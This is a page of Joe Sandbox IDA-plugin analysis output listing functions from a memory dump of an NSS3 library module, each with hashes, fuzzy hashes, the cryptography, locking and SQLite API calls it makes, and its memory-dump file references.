Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
String ID:
API String ID: 653623313-0
Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
Instruction ID: f1b7ebc83bacffc15e8372a65f8491f9a0ffad0526544ea1c2fd7e37af2be48c
Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
Instruction Fuzzy Hash: B5218FB6E0411A9BDF05DFA5DC409AFB7B4AF85314B090826ED18A7A05F731ED11CBE2

Function 6D595F60 Relevance: 12.1, APIs: 8, Instructions: 64COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6D59AADB,?,?,?,?,?,?,?,?,00000000,?,6D5980C1), ref: 6D595F72

Part of subcall function 6D4FED70: DeleteCriticalSection.KERNEL32(?), ref: 6D4FED8F
Part of subcall function 6D4FED70: DeleteCriticalSection.KERNEL32(?), ref: 6D4FED9E
Part of subcall function 6D4FED70: DeleteCriticalSection.KERNEL32(?), ref: 6D4FEDA4

PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6D59AADB,?,?,?,?,?,?,?,?,00000000,?,6D5980C1), ref: 6D595F8F
DeleteCriticalSection.KERNEL32(00000001,00000000,00000000,?,6D59AADB,?,?,?,?,?,?,?,?,00000000,?,6D5980C1), ref: 6D595FCC
free.MOZGLUE(?,?,6D59AADB,?,?,?,?,?,?,?,?,00000000,?,6D5980C1), ref: 6D595FD3
DeleteCriticalSection.KERNEL32(00000001,00000000,00000000,?,6D59AADB,?,?,?,?,?,?,?,?,00000000,?,6D5980C1), ref: 6D595FF4
free.MOZGLUE(?,?,6D59AADB,?,?,?,?,?,?,?,?,00000000,?,6D5980C1), ref: 6D595FFB
PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6D59AADB,?,?,?,?,?,?,?,?,00000000,?,6D5980C1), ref: 6D596019
PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6D59AADB,?,?,?,?,?,?,?,?,00000000,?,6D5980C1), ref: 6D596036

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CriticalDeleteSection$DestroyMonitor$free
String ID:
API String ID: 227462623-0
Opcode ID: 2349f308c5425daa636242467c41b72e89682c3dc345e5859ee4a4d13d2e63af
Instruction ID: 8ddfd8a0c021f32c30acb8b4866cc73db23317cf4487028f3aa182db9482a3fd
Opcode Fuzzy Hash: 2349f308c5425daa636242467c41b72e89682c3dc345e5859ee4a4d13d2e63af
Instruction Fuzzy Hash: 2F214AF1A04B429BEB10CF75D848BA377A8AB41719F01082CE56ACB640EB36F419CBD1

Function 6D610860 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

PR_LogFlush.NSS3(00000000,00000000,?,?,6D617AE2,?,?,?,?,?,?,6D61798A), ref: 6D61086C

Part of subcall function 6D610930: EnterCriticalSection.KERNEL32(?,00000000,?,6D610C83), ref: 6D61094F
Part of subcall function 6D610930: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6D610C83), ref: 6D610974
Part of subcall function 6D610930: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D610983
Part of subcall function 6D610930: _PR_MD_UNLOCK.NSS3(?,?,6D610C83), ref: 6D61099F

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,00000000,?,?,6D617AE2,?,?,?,?,?,?,6D61798A), ref: 6D61087D
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,6D617AE2,?,?,?,?,?,?,6D61798A), ref: 6D610892
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,6D61798A), ref: 6D6108AA
free.MOZGLUE(?,00000000,00000000,?,?,6D617AE2,?,?,?,?,?,?,6D61798A), ref: 6D6108C7
free.MOZGLUE(?,00000000,00000000,?,?,6D617AE2,?,?,?,?,?,?,6D61798A), ref: 6D6108E9
free.MOZGLUE(?,6D617AE2,?,?,?,?,?,?,6D61798A), ref: 6D6108EF
PR_DestroyLock.NSS3(?,00000000,00000000,?,?,6D617AE2,?,?,?,?,?,?,6D61798A), ref: 6D61090E

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: free$__acrt_iob_func$CriticalDestroyEnterFlushLockSectionfclosefflushfwrite
String ID:
API String ID: 3145526462-0
Opcode ID: 4bce6622b4530c55e3da12e50f4c53a074934406c7427e7f160a98cdf1361348
Instruction ID: 9171fd849de041029e4c69aa31bef2d00e0960eaf902223ba918526a9d2d46a6
Opcode Fuzzy Hash: 4bce6622b4530c55e3da12e50f4c53a074934406c7427e7f160a98cdf1361348
Instruction Fuzzy Hash: 8911B2B59492418BFF009B6FDC457663778AB46318F091124EA06C7240D776E865CBD3

Function 6D503C90 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,6D57460B,?,?), ref: 6D503CA9
EnterCriticalSection.KERNEL32(?), ref: 6D503CB9
PL_HashTableLookup.NSS3(?), ref: 6D503CC9
SECITEM_DupItem_Util.NSS3(00000000), ref: 6D503CD6
PR_Unlock.NSS3 ref: 6D503CE6
CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6D503CF6
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D503D03
PR_Unlock.NSS3 ref: 6D503D15

Part of subcall function 6D5ADD70: TlsGetValue.KERNEL32 ref: 6D5ADD8C
Part of subcall function 6D5ADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D5ADDB4

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
String ID:
API String ID: 1376842649-0
Opcode ID: 5f2b0b430eeb1113bedd051cfd8e88a1b092e8d8ebd8f48a657562b3afbdaf7b
Instruction ID: ca53621b6c04b54d1d1e0cab92366d63c438634a897e358f5b4bd485cfbda08a
Opcode Fuzzy Hash: 5f2b0b430eeb1113bedd051cfd8e88a1b092e8d8ebd8f48a657562b3afbdaf7b
Instruction Fuzzy Hash: F4112977C04106B7EB165726EC01E7B3B78EBC2298B0A4531EE1883611FB22DC6486D2

Function 6D509C50 Relevance: 10.8, APIs: 7, Instructions: 253stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6D5211C0: PR_NewLock.NSS3 ref: 6D521216

free.MOZGLUE(?), ref: 6D509E17
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D509E25
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D509E4E
TlsGetValue.KERNEL32 ref: 6D509EA2

Part of subcall function 6D519500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6D519546

EnterCriticalSection.KERNEL32(?), ref: 6D509EB6
PR_Unlock.NSS3 ref: 6D509ED9
PR_SetError.NSS3(FFFFE08A,00000000), ref: 6D509F18

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
String ID:
API String ID: 3381623595-0
Opcode ID: 6330514fcc8052aa158e835b176f4c24bc2e8e87207263fb488ea0c92454d844
Instruction ID: 4709dbf19abbb8a33a99783c5d6d07a535755856beb25809ebd17c182c94c80d
Opcode Fuzzy Hash: 6330514fcc8052aa158e835b176f4c24bc2e8e87207263fb488ea0c92454d844
Instruction Fuzzy Hash: 9D812B76904602ABEB19CF34CC41B7BB7A5BF85248F094928EE5983A45FB31ED14CB91

Function 6D51DCB0 Relevance: 10.7, APIs: 7, Instructions: 245stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6D51AB10: DeleteCriticalSection.KERNEL32(D958E852,6D521397,5B5F5EC0,?,?,6D51B1EE,2404110F,?,?), ref: 6D51AB3C
Part of subcall function 6D51AB10: free.MOZGLUE(D958E836,?,6D51B1EE,2404110F,?,?), ref: 6D51AB49
Part of subcall function 6D51AB10: DeleteCriticalSection.KERNEL32(5D5E6D71), ref: 6D51AB5C
Part of subcall function 6D51AB10: free.MOZGLUE(5D5E6D65), ref: 6D51AB63
Part of subcall function 6D51AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6D51AB6F
Part of subcall function 6D51AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6D51AB76

TlsGetValue.KERNEL32 ref: 6D51DCFA
EnterCriticalSection.KERNEL32(00000000), ref: 6D51DD0E
PK11_IsFriendly.NSS3(?), ref: 6D51DD73
PK11_IsLoggedIn.NSS3(?,00000000), ref: 6D51DD8B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D51DE81
memcpy.VCRUNTIME140(00000000,?,?), ref: 6D51DEA6
PR_Unlock.NSS3(?), ref: 6D51DF08

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
String ID:
API String ID: 519503562-0
Opcode ID: fa231977e217086af10c7e972f6eefe0fed1cad739353071316f89852dd6525a
Instruction ID: 482c7ad34aa938b1a16c600cc277f36d99c421615a7f7e91b71a05bc721c3a89
Opcode Fuzzy Hash: fa231977e217086af10c7e972f6eefe0fed1cad739353071316f89852dd6525a
Instruction Fuzzy Hash: 0F91E2B5A081029BFB08CF68CC80B7ABBB1BF94305F15852ADD199B741E735ED41CB92

Function 6D4D5FC0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000293F4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,6D5BBB62,00000004,6D624CA4,?,?,00000000,?,?,6D4931DB), ref: 6D4D60AB
sqlite3_config.NSS3(00000004,6D624CA4,6D5BBB62,00000004,6D624CA4,?,?,00000000,?,?,6D4931DB), ref: 6D4D60EB
sqlite3_config.NSS3(00000012,6D624CC4,?,?,6D5BBB62,00000004,6D624CA4,?,?,00000000,?,?,6D4931DB), ref: 6D4D6122

Strings

misuse, xrefs: 6D4D609F
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D4D6095
%s at line %d of [%.10s], xrefs: 6D4D60A4

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: sqlite3_config$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse
API String ID: 1634735548-648709467
Opcode ID: 803db632133a9a1d05d35cf12c5eb4dc2cf667077e8cbc50d4bec1dc26aee885
Instruction ID: 63905cb77042e240b26647c44432b0b580be8d953770e3d27f23ade56d312882
Opcode Fuzzy Hash: 803db632133a9a1d05d35cf12c5eb4dc2cf667077e8cbc50d4bec1dc26aee885
Instruction Fuzzy Hash: FFB14D34D0864ACFCF05CF6DC290AA9B7F0FB1E304B158259D509AB362E730AE95CB95

Function 6D484F60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 211stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D484FC4
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D4851BB

Strings

misuse, xrefs: 6D4851AF
unable to delete/modify user-function due to active statements, xrefs: 6D4851DF
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D4851A5
%s at line %d of [%.10s], xrefs: 6D4851B4

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: sqlite3_logstrlen
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
API String ID: 3619038524-4115156624
Opcode ID: e954164167a47cfc0e0ccebf51729cdbad9e42cfdcc722c1920122891e2660c7
Instruction ID: 98656a4c4adf05cc2d8ae59a967d040d3e63011ceffa90a872c5c53c4dcfb810
Opcode Fuzzy Hash: e954164167a47cfc0e0ccebf51729cdbad9e42cfdcc722c1920122891e2660c7
Instruction Fuzzy Hash: BA719075A1420A9BDB01CE15CC80FBA77BABF49385F158128FE1A9B346D731EC51CBA1

Function 6D5729E0 Relevance: 10.7, APIs: 7, Instructions: 181COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,00000000,00000000,?,?,6D5721DD,00000000), ref: 6D572A47
SEC_ASN1EncodeInteger_Util.NSS3(?,6D5721DD,00000002,00000000,00000000,?,?,6D5721DD,00000000), ref: 6D572A60
SECOID_FindOIDByTag_Util.NSS3(00000000,?,?,?,?,00000000,00000000,?,?,6D5721DD,00000000), ref: 6D572A8E
PK11_KeyGen.NSS3(00000000,?,00000000,83F089CA,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D572AE9
PORT_ArenaMark_Util.NSS3(00000000), ref: 6D572B0D
PK11_FreeSymKey.NSS3(?), ref: 6D572B7B
PK11_FreeSymKey.NSS3(?), ref: 6D572BD6

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: K11_Util$Free$ArenaEncodeErrorFindInteger_Mark_Tag_
String ID:
API String ID: 1625981074-0
Opcode ID: 32a3941d6ea15cd8b4ae97660b55c8948ef5b7108ae5cee41cd28531f28866a0
Instruction ID: 0c2a83fba66ad0e10aaf1916f8749b1595a4fb5dfcd23abea20834e780152e54
Opcode Fuzzy Hash: 32a3941d6ea15cd8b4ae97660b55c8948ef5b7108ae5cee41cd28531f28866a0
Instruction Fuzzy Hash: 7F51D671E002069FEB38CE69DC80F7A73B5AF54328F254438ED1997691E731E905C791

Function 6D56FF10 Relevance: 10.7, APIs: 7, Instructions: 164memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400,?,?,00000000,00000000,?,6D56F165,?), ref: 6D56FF4B
PORT_ArenaAlloc_Util.NSS3(00000000,-000000F8,?,?,?,00000000,00000000,?,6D56F165,?), ref: 6D56FF6F
memset.VCRUNTIME140(00000000,00000000,-000000F8,?,?,?,?,?,00000000,00000000,?,6D56F165,?), ref: 6D56FF81
PORT_ArenaAlloc_Util.NSS3(00000000,-000000F8,?,?,?,?,?,00000000,00000000,?,6D56F165,?), ref: 6D56FF8D
memset.VCRUNTIME140(00000000,00000000,-000000F8,?,?,?,?,?,?,?,00000000,00000000,?,6D56F165,?), ref: 6D56FFA3
SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,6D56F165,6D63219C,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6D56FFC8
PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,00000000,00000000,?,6D56F165,?), ref: 6D5700A6

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$Alloc_ArenaArena_memset$EncodeFreeItem_
String ID:
API String ID: 204871323-0
Opcode ID: 0aa5b0a731a95bac749a95400d11eb8bf0cc5eb1f1377cc9920648ea244c5bab
Instruction ID: 7e657d10e026562dd5dfe4f8944b5915c06fad64a9b0e73f526a6c7d17e44093
Opcode Fuzzy Hash: 0aa5b0a731a95bac749a95400d11eb8bf0cc5eb1f1377cc9920648ea244c5bab
Instruction Fuzzy Hash: 6D51E571E042169BDB298E6DC8807BEB7F5BB49325FA5452ADD55A7B40D332AC00CBE0

Function 6D52BCF0 Relevance: 10.6, APIs: 7, Instructions: 142memoryCOMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6D52BD1E

Part of subcall function 6D502F00: PORT_NewArena_Util.NSS3(00000800), ref: 6D502F0A
Part of subcall function 6D502F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6D502F1D

Part of subcall function 6D5457D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6D50B41E,00000000,00000000,?,00000000,?,6D50B41E,00000000,00000000,00000001,?), ref: 6D5457E0
Part of subcall function 6D5457D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6D545843

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6D52BD8C

Part of subcall function 6D55FAB0: free.MOZGLUE(?,-00000001,?,?,6D4FF673,00000000,00000000), ref: 6D55FAC7

CERT_DestroyCertList.NSS3(00000000), ref: 6D52BD9B
SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6D52BDA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D52BE3A

Part of subcall function 6D503E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D503EC2
Part of subcall function 6D503E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6D503ED6
Part of subcall function 6D503E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6D503EEE
Part of subcall function 6D503E60: PR_CallOnce.NSS3(6D662AA4,6D5612D0), ref: 6D503F02
Part of subcall function 6D503E60: PL_FreeArenaPool.NSS3 ref: 6D503F14
Part of subcall function 6D503E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6D503F27

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D52BE52

Part of subcall function 6D502E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6D502CDA,?,00000000), ref: 6D502E1E
Part of subcall function 6D502E00: SECITEM_DupItem_Util.NSS3(?), ref: 6D502E33
Part of subcall function 6D502E00: TlsGetValue.KERNEL32 ref: 6D502E4E
Part of subcall function 6D502E00: EnterCriticalSection.KERNEL32(?), ref: 6D502E5E
Part of subcall function 6D502E00: PL_HashTableLookup.NSS3(?), ref: 6D502E71
Part of subcall function 6D502E00: PL_HashTableRemove.NSS3(?), ref: 6D502E84
Part of subcall function 6D502E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6D502E96
Part of subcall function 6D502E00: PR_Unlock.NSS3 ref: 6D502EA9

PR_SetError.NSS3(FFFFE013,00000000), ref: 6D52BE61

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$Item_$Zfree$ArenaHashTable$CertListPoolfree$AllocAlloc_Arena_CallCopyCriticalDecodeDestroyEnterErrorFreeInitK11_LookupOnceQuickRemoveSectionTokensUnlockValue
String ID:
API String ID: 2178860483-0
Opcode ID: 519b2d905a28856bad7c68ec880cc97ae08226f1b569ad210dff78a2724446dc
Instruction ID: 755d19f09cb1e2722d53543cc8a2c02f026a9123423da20b22ece855f190605a
Opcode Fuzzy Hash: 519b2d905a28856bad7c68ec880cc97ae08226f1b569ad210dff78a2724446dc
Instruction Fuzzy Hash: 9E41F3B6A04210AFC714DF24DC80B6A77E4EF89718F058528FA0997A91E731EC14CB93

Function 6D516980 Relevance: 10.6, APIs: 7, Instructions: 126COMMON

Download Yara Rule

APIs

Part of subcall function 6D515DB0: NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D515DEC
Part of subcall function 6D515DB0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6D515E0F

SECITEM_DupItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D5169BA

Part of subcall function 6D55FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6D509003,?), ref: 6D55FD91
Part of subcall function 6D55FD80: PORT_Alloc_Util.NSS3(A4686D56,?), ref: 6D55FDA2
Part of subcall function 6D55FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686D56,?,?), ref: 6D55FDC4

VFY_EndWithSignature.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6D516A59
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D516AB7
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D516ACA
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D516AE0
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D516AE9

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

